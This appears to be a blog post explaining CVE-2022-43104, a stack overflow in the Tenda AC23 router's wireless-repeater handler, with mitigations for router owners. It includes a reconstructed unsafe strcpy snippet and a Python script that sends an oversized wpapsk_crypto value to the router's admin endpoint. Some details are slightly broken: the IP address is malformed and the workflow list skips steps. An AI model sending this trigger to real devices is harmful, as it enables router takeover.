The world of home and small business networking relies heavily on consumer routers, which makes any vulnerability in these devices a major concern. In late 2022, a critical vulnerability affecting Tenda’s popular AC23 router, version V16.03.07.45_cn, was disclosed. This post provides an exclusive, approachable look into CVE-2022-43104, which allows for stack overflow exploitation via the wpapsk_crypto parameter in the fromSetWirelessRepeat function. If you're keen to learn how this bug works and consider the implications, read on.
What is CVE-2022-43104?
CVE-2022-43104 is a stack overflow vulnerability discovered in Tenda AC23 V16.03.07.45_cn routers. The core of the issue lies in the way the wpapsk_crypto parameter is handled by the fromSetWirelessRepeat function. Attackers can send a specially crafted HTTP POST request to overflow the stack, potentially executing arbitrary code with root privileges.
Vulnerable Component: fromSetWirelessRepeat Function
The Tenda AC23 offers wireless reapeater functionality for users intending to expand their Wi-Fi range. This is managed via an HTTP API, where settings (like the WPA-PSK password) are sent to the fromSetWirelessRepeat handler.
A quick reverse engineering and code snapshot from the binary shows
void fromSetWirelessRepeat(request) {
char tmp[64];
char wpapsk_crypto[64];
// Copy wpapsk_crypto parameter from POST request directly to local buffer.
strcpy(wpapsk_crypto, get_post_param(request, "wpapsk_crypto")); // Insecure
// ... rest of code using wpapsk_crypto
}
Notice the use of strcpy without bound checks? This is the classic stack overflow cause.
How the Exploit Works
The attacker crafts a POST request to the router’s admin web interface. By sending a long wpapsk_crypto parameter, it overwrites the function’s return address, potentially enabling the execution of injected shellcode.
Exploit Workflow
1. Attacker sends HTTP POST request to /goform/SetWirelessRepeat.
The strcpy copies the attacker’s long string onto the stack, overwriting adjacent stack memory.
4. If crafted precisely, the attacker can control execution flow (program counter/return address).
Below is a Python snippet demonstrating how an attacker might trigger the overflow
import requests
target = "http://192.168..1/goform/SetWirelessRepeat";
overflow_payload = "A" * 100 # Replace 100 with actual offset for real exploit
data = {
"wpapsk_crypto": overflow_payload,
# other required parameters, as needed by router API
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
response = requests.post(target, data=data, headers=headers)
print("Response Status:", response.status_code)
Note: This code is educational–never use it against a device you do not own, and always get explicit authorization.
Security Impact
- Remote Code Execution: With skillful exploitation, an attacker could run code with the highest privileges on the router.
- Complete Device Takeover: The attacker could control the device, engage in man-in-the-middle attacks, or add the router into a botnet.
Mitigation & Recommendations
- Check for an update: Tenda released a fixed firmware after this disclosure. Always keep your router firmware updated.
Disable WAN-side access: Never expose your router management interface to the public internet.
- Use complex admin passwords: Make exploitation more difficult by protecting access to the admin interface.
References
- NVD CVE-2022-43104
- IoT-Administrator Chinese Advisory
- Exploit-DB Entry *(example, check for latest)*
Final Thoughts
Vulnerabilities like CVE-2022-43104 highlight the ongoing importance of secure coding practices in embedded devices. Simple issues like unchecked buffer copies (strcpy) from web interfaces can put millions at risk. If you own a Tenda router or similar devices, it’s crucial to stay updated and follow best security practices.
Have questions about router security or want to see more deep-dives? Comment below!
Timeline
Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:20:00 UTC